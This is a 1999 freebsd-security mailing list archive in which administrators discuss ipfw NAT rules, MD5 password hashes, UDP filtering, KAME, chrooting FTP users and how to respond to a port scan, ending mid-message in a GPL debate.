id 3A55B14E1C for ; Wed, 21 Apr 1999 10:34:47 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id NAA04945; Wed, 21 Apr 1999 13:32:16 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14110.2976.43026.123677@trooper.velocet.ca> Date: Wed, 21 Apr 1999 13:32:16 -0400 (EDT) To: Phil Gilley Cc: Thomas Uhrfelt , freebsd-security@FreeBSD.ORG Subject: Re: SV: Sample Ipfw scripts? In-Reply-To: References: <01BE8B49.BD40B300.thomas.uhrfelt@plymovent.se> X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Phil" == Phil Gilley writes: Phil> examples for people to learn from. Does anyone care to show off Phil> what they're doing with ipfw? One thing in particular that I've done with ipfw that is different from the rc.firewall is to change a rule like: add 10 divert 8668 ip from any to any via ed0 (where ed0 is the external interface, to) add 10 divert 8668 ip from 192.168.0.0/16 to any out via ed0 add 11 divert 8668 ip from any to a.b.c.d in via ed0 where a.b.c.d is a virtual address on ed0 used only for NAT. This avoids putting every packet through NAT (and is one of the primary advantages to the FreeBSD style of divert sockets over Linux-style NAT rules). This reduces the load that NAT produces (can be important if only a small amount of traffic is NAT'd) and also allows you to kill natd from points other than the console as long as you're not involved in the divert rule. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 21 13:53:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (Postfix) with ESMTP id 1A31015096 for ; Wed, 21 Apr 1999 13:52:41 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.9.3/8.9.3) with ESMTP id QAA12699 for ; Wed, 21 Apr 1999 16:49:15 -0400 (EDT) Date: Wed, 21 Apr 1999 16:49:15 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: security@freebsd.org Subject: How many bits in a FreeBSD MD5 passwd hash? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I checked passwd(5), but I didn't see anything about this. For some reason I think it's 128, but I can't remember where it's documented. Anyone? Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 21 15:54:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.welearn.com.au (phoenix.welearn.com.au [139.130.44.81]) by hub.freebsd.org (Postfix) with ESMTP id A393B14DBF for ; Wed, 21 Apr 1999 15:54:36 -0700 (PDT) (envelope-from sue@phoenix.welearn.com.au) Received: (from sue@localhost) by phoenix.welearn.com.au (8.9.1/8.9.0) id IAA17918; Thu, 22 Apr 1999 08:51:59 +1000 (EST) Message-ID: <19990422085156.55396@welearn.com.au> Date: Thu, 22 Apr 1999 08:51:56 +1000 From: Sue Blake To: ben@rosengart.com Cc: security@FreeBSD.ORG Subject: Re: How many bits in a FreeBSD MD5 passwd hash? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: ; from Snob Art Genre on Wed, Apr 21, 1999 at 04:49:15PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 21, 1999 at 04:49:15PM -0400, Snob Art Genre wrote: > I checked passwd(5), but I didn't see anything about this. For some > reason I think it's 128, but I can't remember where it's documented. > Anyone? Yes, 128. Try passwd(1) instead. -- Regards, -*Sue*- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 22 5:14:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from penguin.wise.edt.ericsson.se (penguin-ext.wise.edt.ericsson.se [194.237.142.5]) by hub.freebsd.org (Postfix) with ESMTP id 0AB38159D7 for ; Thu, 22 Apr 1999 05:13:54 -0700 (PDT) (envelope-from teima@teidns1.tei.ericsson.se) Received: from tei.ericsson.se (mailhub.tei.ericsson.se [141.137.137.57]) by penguin.wise.edt.ericsson.se (8.9.0/8.9.0/WIREfire-1.2) with SMTP id OAA27852 for ; Thu, 22 Apr 1999 14:11:20 +0200 (MET DST) Received: from teidns1.tei.ericsson.se by tei.ericsson.se (SMI-8.6/SMI-SVR4) id OAA24075; Thu, 22 Apr 1999 14:12:19 +0200 Received: from [141.137.146.193] by teidns1.tei.ericsson.se (5.0/SMI-SVR4) id AA21103; Thu, 22 Apr 1999 14:06:01 --100 Message-Id: <371F1202.C5F5DD5E@teidns1.tei.ericsson.se> Date: Thu, 22 Apr 1999 14:11:46 +0200 From: Valter Mazzaro Organization: Ericsson Telecomunicazioni X-Mailer: Mozilla 4.05 [en] (Win95; I) Mime-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Firewalls filtering UDP packets Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I strongly need a suggestion from you guys!!! I'm not a security expert at all and probably what I'll ask doesn't make so huge sense, but I'm dealing with a particular problem and I hope you could give me a hint. I have a network that is connected to the outside world via an Access Server (Cisco 5200) which terminates dial-in calls. Behind the AS I have a freebsd firewall that let the traffic get in the DMZ, where some IP services are provided (WWW server, DNS, TACACS+, etc.). The DMZ is separated from the internal net from another firewall. For a particular service I need to allow UDP traffic to get in the DMZ. I know that usually is not secure to allow such a traffic in, but I need it anyway and I'd like to have the more secure solution I can. I was thinking to filter packets following these rules: - allow all the IP source addresses assigned by the AS (in a certain pool range) and incoming from the FW interface to which the AS is attacched. - allow all the UDP destination addresses that corresponds to the port number on which the service daemon is listening My questions are 2: 1) In your opinion could this be enough or do you have some further suggestions? 2) This comes from my poor knowledge on Unix internal. I think, not sure :-( , that when a TCP connection is set to a server, the server daemon is listening to a well-known port (like 23 in telnet). If a request comes from a client, the daemon forks the process that start to listen on another socket (by consequence the TCP destination port will change for the packets coming from the clients). Is it the same for UDP? I know that I'm speaking about a connectionless thing, but for my problem it's important to know whether the UDP destination port (not to be filtered in the FW) change. Thank you a lot in advance, sorry for my long text and please reply to my email address as well, as I'm not subscribed to the list at the moment. Valter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 22 9: 2: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from xap.xyplex.com (xap.xyplex.com [140.179.130.200]) by hub.freebsd.org (Postfix) with ESMTP id 6894515AC5 for ; Thu, 22 Apr 1999 09:01:55 -0700 (PDT) (envelope-from rwhitesel@nbase-xyplex.com) Received: from pcrlw (pcrlw.xyplex.com [140.179.228.211]) by xap.xyplex.com (8.8.5/8.7.3) with SMTP id LAA11741 for ; Thu, 22 Apr 1999 11:57:14 -0400 (EDT) Message-ID: <000b01be8cd9$a53728c0$d3e4b38c@xyplex.com> From: "Rick Whitesel" To: "freebsd-security FreeBSD.org" Subject: KAME integration Date: Thu, 22 Apr 1999 12:03:21 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi: Can anyone tell me the status of KAME integration into FreeBSD? It looks like Linux is going with FreeS/WAN and the other BSDs seem to be going with KAME or NRL. Thank you: Rick Whitesel Scientist NBase-Xyplex rwhitesel@nbase-xyplex.com "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, 1759 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 22 11: 5:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from gridley.ACNS.Carleton.edu (Gridley.ACNS.Carleton.edu [137.22.96.1]) by hub.freebsd.org (Postfix) with ESMTP id 6FEE91503A for ; Thu, 22 Apr 1999 11:05:39 -0700 (PDT) (envelope-from hedberge@gridley.acns.carleton.edu) Received: by gridley.ACNS.Carleton.edu (Postfix, from userid 1002) id DCAD05A38; Thu, 22 Apr 1999 12:58:21 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by gridley.ACNS.Carleton.edu (Postfix) with ESMTP for id D727616828; Thu, 22 Apr 1999 12:58:21 -0500 (CDT) Date: Thu, 22 Apr 1999 12:58:21 -0500 (CDT) From: Eric Hedberg To: freebsd-security@freebsd.org Subject: login.conf and chroot Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Silly me, I deleted the reference to the login patches for chroot just before I realized I had an application for them. Could someone send me the link? Regards, Eric Hedberg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 23 19:37:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id DFE84151AF for ; Fri, 23 Apr 1999 19:37:31 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id EAA17854 for freebsd-security@FreeBSD.ORG; Sat, 24 Apr 1999 04:35:00 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 449428840; Sat, 24 Apr 1999 02:18:10 +0200 (CEST) Date: Sat, 24 Apr 1999 02:18:10 +0200 From: Ollivier Robert To: "freebsd-security FreeBSD.org" Subject: Re: KAME integration Message-ID: <19990424021810.A19209@keltia.freenix.fr> Mail-Followup-To: "freebsd-security FreeBSD.org" References: <000b01be8cd9$a53728c0$d3e4b38c@xyplex.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.3i In-Reply-To: <000b01be8cd9$a53728c0$d3e4b38c@xyplex.com>; from Rick Whitesel on Thu, Apr 22, 1999 at 12:03:21PM -0400 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5244 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Rick Whitesel: > Can anyone tell me the status of KAME integration into FreeBSD? It looks > like Linux is going with FreeS/WAN and the other BSDs seem to be going with > KAME or NRL. There still ongoing work by the INRIA/KAME/NRL guys to merge the three stacks into one. More news in a few months I think. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #2: Fri Apr 16 22:37:03 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 9:44: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from server.pentalpha.com.hk (unknown [210.176.109.29]) by hub.freebsd.org (Postfix) with ESMTP id 48F9514F76 for ; Sat, 24 Apr 1999 09:43:59 -0700 (PDT) (envelope-from danny@pentalpha.com.hk) Received: from hing ([10.0.0.153]) by server.pentalpha.com.hk (8.9.1a/8.9.1) with SMTP id AAA12088 for ; Sun, 25 Apr 1999 00:43:58 +0800 (CST) Message-ID: <007c01be8e71$a76c64e0$f439fea9@hing> From: "danny" To: Subject: network scan Date: Sun, 25 Apr 1999 00:43:59 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From the system log, I found that someone try to scan my server. How can I stop him from do it again? Danny Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 w.x.y.z:80 in via xl0 Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 w.x.y.z:21 in via xl0 Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252 Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 w.x.y.z:161 in via xl0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 12: 0:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from andyo.prime.net (P1M9.prime.net.ua [195.64.229.41]) by hub.freebsd.org (Postfix) with ESMTP id D46FB14BE0 for ; Sat, 24 Apr 1999 12:00:03 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.9.3/8.9.3) with ESMTP id WAA00358 for ; Sat, 24 Apr 1999 22:01:21 +0300 (EET DST) Message-ID: <372214FD.A0035005@prime.net.ua> Date: Sat, 24 Apr 1999 22:01:18 +0300 From: =?koi8-r?Q?=E1=CE=C4=D2=C5=CA=20=F7=2E=20=EF=CC=C5=CA=CE=C9=CB?= (Andy V. Oleynik) Reply-To: andyo@prime.net.ua Organization: =?koi8-r?Q?=ED=2D=E9=CE=C6=CF?= X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: network scan References: <007c01be8e71$a76c64e0$f439fea9@hing> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org IPFW does it for U. Only thing U may take care about is ftpd which accepts connections from Internet. But if U've this service public U have only to advance its security. Generally U may to tcpdump xl0 for pattern src host 203.93.49.252 to be sure that this is not spoofed and contact corresponding responsible person to realize what happened. BTW, lately in the internet too much lammers appeared that used SATAN :) danny wrote: > >From the system log, I found that someone try to scan my server. How can I > stop him from do it again? > Danny > > Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 > w.x.y.z:80 in via xl0 > Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 > w.x.y.z:21 in via xl0 > Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252 > Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 > w.x.y.z:161 in via xl0 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Andy V. Oleynik (When U aim for perfection, U discover it's a moving target ö80) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 15:12:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from well.apcs.com.au (well.apcs.com.au [203.41.122.5]) by hub.freebsd.org (Postfix) with ESMTP id F3B7215088 for ; Sat, 24 Apr 1999 15:12:30 -0700 (PDT) (envelope-from keith@well.apcs.com.au) Received: (from keith@localhost) by well.apcs.com.au (8.9.3/8.9.2) id IAA23647; Sun, 25 Apr 1999 08:06:15 +1000 (EST) (envelope-from keith) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <372214FD.A0035005@prime.net.ua> Date: Sun, 25 Apr 1999 08:06:15 +1000 (EST) Reply-To: keith@apcs.com.au Organization: Australia Power Control Systems Pty Limited From: Keith To: (Andy V. Oleynik) Subject: Re: network scan Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Andy Please tell me more ? "Generally U may to tcpdump xl0 for pattern" What is this Keith On 24-Apr-99 Andy V. Oleynik wrote: > IPFW does it for U. > Only thing U may take care about is > ftpd which accepts connections from Internet. > But if U've this service public U have only > to advance its security. > Generally U may to tcpdump xl0 for pattern > src host 203.93.49.252 to be sure that this > is not spoofed and contact corresponding > responsible person to realize what happened. > BTW, lately in the internet too much lammers > appeared that used SATAN :) > danny wrote: > >> >From the system log, I found that someone try to scan my server. How can I >> stop him from do it again? >> Danny >> >> Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 >> w.x.y.z:80 in via xl0 >> Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 >> w.x.y.z:21 in via xl0 >> Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252 >> Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 >> w.x.y.z:161 in via xl0 >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > > -- > Andy V. Oleynik > (When U aim for perfection, > U discover it's a moving target ö80) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message "The box said 'Requires Windows 95, NT, or better,' so I installed FreeBSD." ** The thing I like most about Windows 98 is... ** You can download FreeBSD with it! ---------------------------------- E-Mail: Keith Australia Power Control Systems Pty. Limited. Date: 25-Apr-99 Time: 08:04:58 Satelite Service 64K to 2Meg This message was sent by XFMail ---------------------------------- What's the similarity between an air conditioner and a computer? They both stop working when you open windows. ---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 15:22: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from chapman.karlskrona.se (chapman.karlskrona.se [195.84.83.130]) by hub.freebsd.org (Postfix) with ESMTP id 5F2EE15130 for ; Sat, 24 Apr 1999 15:21:59 -0700 (PDT) (envelope-from erik@chapman.karlskrona.se) Received: from luke (dialup145-2-32.swipnet.se [130.244.145.96]) by chapman.karlskrona.se (8.9.2/8.9.2) with SMTP id AAA10355 for ; Sun, 25 Apr 1999 00:19:32 +0200 (CEST) (envelope-from erik@chapman.karlskrona.se) Message-Id: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> X-Sender: erik@chapman.karlskrona.se X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Sun, 25 Apr 1999 00:19:44 +0200 To: freebsd-security@FreeBSD.org From: erik Subject: limit ftp users to their homedir Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org is there a way to deny a registered user access to anything but his own homedirectory? it would be nice if it was the same as with anonymous access.. ie. users who cwd to "/" , really enters the virtual ftp root instead of the real system root. is this possible to do with _none anonymous_ users? for example: in a normal setup, when user foo ftps to the system, the initial directory will be his homedirectory. when (for some reason) he cwd to "/" he will enter the real system root. can you limit him to only access his own stuff, ie. a cwd to / will bring him to /home/fred. any suggestions appreciated! /erik To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 15:31: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id BBD9C151E1 for ; Sat, 24 Apr 1999 15:31:00 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id TAA22694; Sat, 24 Apr 1999 19:29:56 -0300 (ADT) Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id TAA24432; Sat, 24 Apr 1999 19:29:54 -0300 (ADT) Date: Sat, 24 Apr 1999 19:29:54 -0300 (ADT) From: Michael Richards <026809r@dragon.acadiau.ca> X-Sender: 026809r@dragon To: erik Cc: security@freebsd.org Subject: Re: limit ftp users to their homedir In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 25 Apr 1999, erik wrote: > is there a way to deny a registered user access to anything but his own > homedirectory? Yes, we do it with ProFTPD. Works quite well. Make sure you install the latest version. I think the pre-release 1 had an exploit. -Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 15:36:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from acetylene.vapornet.net (acetylene.vapornet.net [209.100.218.11]) by hub.freebsd.org (Postfix) with ESMTP id B03E6151E1 for ; Sat, 24 Apr 1999 15:36:47 -0700 (PDT) (envelope-from john@vapornet.net) Received: from datapit.home.vapornet.net (vapornet.xnet.com. [205.243.141.107]) by acetylene.vapornet.net (8.9.3/8.9.3/VaporServer 2.01) with ESMTP id RAA04550; Sat, 24 Apr 1999 17:36:52 -0500 (CDT) (envelope from: john@vapornet.net) Received: from habanero.chili-pepper.net (habanero.chili-pepper.net [192.168.0.11]) by datapit.home.vapornet.net (8.9.3/8.9.3/VaporServer 1.4) with ESMTP id RAA10907; Sat, 24 Apr 1999 17:37:10 -0500 (CDT) (envelope from: john@vapornet.net) Received: (from john@localhost) by habanero.chili-pepper.net (8.9.3/8.9.3/VaporClient v3.1) id RAA08751; Sat, 24 Apr 1999 17:36:40 -0500 (CDT) (envelope from: john@vapornet.net) From: John Preisler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Sat, 24 Apr 1999 17:36:40 -0500 (CDT) To: erik Cc: freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14114.18124.843396.946822@habanero.chili-pepper.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org add their login to /etc/ftpchroot or add the boolean "ftp-chroot" capability in login.conf as per the ftpd man page. -j erik writes: > > is there a way to deny a registered user access to anything but his own > homedirectory? > > it would be nice if it was the same as with anonymous access.. ie. users > who cwd to "/" , > really enters the virtual ftp root instead of the real system root. > > is this possible to do with _none anonymous_ users? > > for example: > > in a normal setup, when user foo ftps to the system, the initial directory > will be > his homedirectory. when (for some reason) he cwd to "/" he will enter the > real system root. > can you limit him to only access his own stuff, ie. a cwd to / will bring > him to /home/fred. > > any suggestions appreciated! > > /erik > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 18:14:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id EF9FE14C22 for ; Sat, 24 Apr 1999 18:14:27 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id TAA04952; Sat, 24 Apr 1999 19:11:47 -0600 (MDT) Message-Id: <4.2.0.32.19990424191010.04521e00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sat, 24 Apr 1999 19:11:09 -0600 To: Michael Richards <026809r@dragon.acadiau.ca>, erik From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@FreeBSD.ORG In-Reply-To: References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don't use ProFTPd; it's GPLed. The BSD ftpd is capable of chrooting users if you put their names in /etc/ftpchroot; see the man page. --Brett At 07:29 PM 4/24/99 -0300, Michael Richards wrote: >On Sun, 25 Apr 1999, erik wrote: > >> is there a way to deny a registered user access to anything but his own >> homedirectory? >Yes, we do it with ProFTPD. Works quite well. Make sure you install the >latest version. I think the pre-release 1 had an exploit. > >-Michael > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message "A man should learn to detect that gleam of light which flashes across his mind from within, more than the lustre of the firmament of bards and sages. Yet he dismisses without notice his thought, because it is his! In every work of genius we recognize our own rejected thoughts; they come back to us with a certain alienated majesty. Great works of art have no more affecting lesson than this: they teach us to abide by our spontaneous impression with good-humored inflexibility then most when the whole cry of voices is on the other side. Else, tomorrow a stranger will say with masterly good sense precisely what we have thought and felt all the time, and we shall be forced to take with shame our own opinion from another." -- Ralph Waldo Emerson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 18:18:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from server.pentalpha.com.hk (unknown [210.176.109.29]) by hub.freebsd.org (Postfix) with ESMTP id 77C9714F4A for ; Sat, 24 Apr 1999 18:18:46 -0700 (PDT) (envelope-from danny@pentalpha.com.hk) Received: from hing ([10.0.0.153]) by server.pentalpha.com.hk (8.9.1a/8.9.1) with SMTP id JAA12699; Sun, 25 Apr 1999 09:18:21 +0800 (CST) Message-ID: <005001be8eb9$7f300520$fb97fea9@hing> From: "danny" To: , References: <007c01be8e71$a76c64e0$f439fea9@hing> <372214FD.A0035005@prime.net.ua> Subject: Re: network scan Date: Sun, 25 Apr 1999 09:18:15 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Generally U may to tcpdump xl0 for pattern" <- how can I do it? Also, I found that 203.93.49.252 also scan my friend's nework. How can I contact corresponding responsible person to realize what happened? Danny ----- Original Message ----- From: áÎÄÒÅÊ ÷. ïÌÅÊÎÉË (Andy V. Oleynik) To: Sent: Sunday, April 25, 1999 3:01 AM Subject: Re: network scan > IPFW does it for U. > Only thing U may take care about is > ftpd which accepts connections from Internet. > But if U've this service public U have only > to advance its security. > Generally U may to tcpdump xl0 for pattern > src host 203.93.49.252 to be sure that this > is not spoofed and contact corresponding > responsible person to realize what happened. > BTW, lately in the internet too much lammers > appeared that used SATAN :) > danny wrote: > > > >From the system log, I found that someone try to scan my server. How can I > > stop him from do it again? > > Danny > > > > Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 > > w.x.y.z:80 in via xl0 > > Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 > > w.x.y.z:21 in via xl0 > > Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252 > > Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 > > w.x.y.z:161 in via xl0 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Andy V. Oleynik > (When U aim for perfection, > U discover it's a moving target ö80) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 20:15:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.sdca.home.com (ha1.rdc1.sdca.home.com [24.0.3.66]) by hub.freebsd.org (Postfix) with ESMTP id EDACF14CAA for ; Sat, 24 Apr 1999 20:15:38 -0700 (PDT) (envelope-from jay@doscher.com) Received: from [10.10.10.2] ([24.4.93.129]) by mail.rdc1.sdca.home.com (InterMail v4.00.03 201-229-104) with ESMTP id <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.129]>; Sat, 24 Apr 1999 20:15:38 -0700 X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410) Date: Sat, 24 Apr 1999 20:21:07 -0800 Subject: Re: limit ftp users to their homedir From: "Jay Doscher" To: Brett Glass , Michael Richards <026809r@dragon.acadiau.ca>, erik Cc: security@FreeBSD.ORG Mime-version: 1.0 X-Priority: 3 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Message-Id: <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.129]> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This may be a dumb question, but what in the heck is wrong with GPL software? I will concede that with the widely 